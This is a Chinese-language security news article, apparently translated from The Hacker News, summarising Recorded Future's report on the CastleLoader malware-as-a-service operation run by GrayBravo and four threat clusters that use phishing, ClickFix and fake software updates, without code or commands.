HackerNews 编译，转载请注明出处： 已观察到四个不同的威胁活动集群正在利用一种名为CastleLoader的恶意软件加载程序，这强化了先前的评估，即该工具是以恶意软件即服务模式提供给其他威胁行为者的。 CastleLoader背后的威胁行为者已被Recorded Future的Insikt Group命名为GrayBravo，该组织先前将其追踪为TAG-150。 这家万事达卡旗下的公司在今天发布的分析报告中表示，GrayBravo的特点是“快速的开发周期、技术复杂性、对公开报告的响应能力以及广泛且不断发展的基础设施”。 网络安全 该威胁行为者工具集中的一些显著工具包括一个名为CastleRAT的远程访问木马和一个被称为CastleBot的恶意软件框架，该框架包含三个组件：一个shellcode加载器/下载器、一个加载器和一个核心后门。 CastleBot加载器负责注入核心模块，该模块能够联系其命令与控制服务器以检索任务，使其能够下载并执行DLL、EXE和PE（可移植可执行文件）有效载荷。通过此框架分发的部分恶意软件家族包括DeerStealer、RedLine Stealer、StealC Stealer、NetSupport RAT、SectopRAT、MonsterV2、WARMCOOKIE，甚至包括Hijack Loader等其他加载程序。 Recorded Future的最新分析揭示了四个活动集群，每个集群采用不同的策略运作—— 集群1：使用网络钓鱼和ClickFix技术分发CastleLoader，以物流行业为目标（自2025年3月起活跃，被追踪为TAG-160）。 集群2：使用Booking.com主题的ClickFix攻击活动分发CastleLoader和Matanbuchus 3.0（自2025年6月起活跃，被追踪为TAG-161）。 集群3：使用冒充Booking.com的基础设施，结合ClickFix和Steam Community页面作为秘密情报点来通过CastleLoader分发CastleRAT（自2025年3月起活跃）。 集群4：使用恶意广告和伪装成Zabbix与RVTools的虚假软件更新诱饵来分发CastleLoader和NetSupport RAT（自2025年4月起活跃）。 TAG-160发起的攻击也因使用在DAT Freight & Analytics和Loadlink Technologies等货运匹配平台上创建欺诈或已泄露的账户来增强其网络钓鱼活动的可信度而引人注目。Recorded Future补充道，此活动说明其对行业运营有深刻理解，包括冒充合法物流公司、利用货运匹配平台以及模仿真实通信以增强其欺骗性和影响力。 目前评估认为（置信度较低），此活动可能与去年针对北美运输和物流公司分发各种恶意软件家族的另一个未归因集群有关。 Recorded Future表示：“GrayBravo已显著扩大了其用户群，越来越多利用其CastleLoader恶意软件的威胁行为者和运营集群就是明证。这一趋势凸显出，技术上先进且适应性强的工具，特别是来自像GrayBravo这样具有声誉的威胁行为者，一旦被证明有效，如何在网络犯罪生态系统中迅速扩散。” 消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文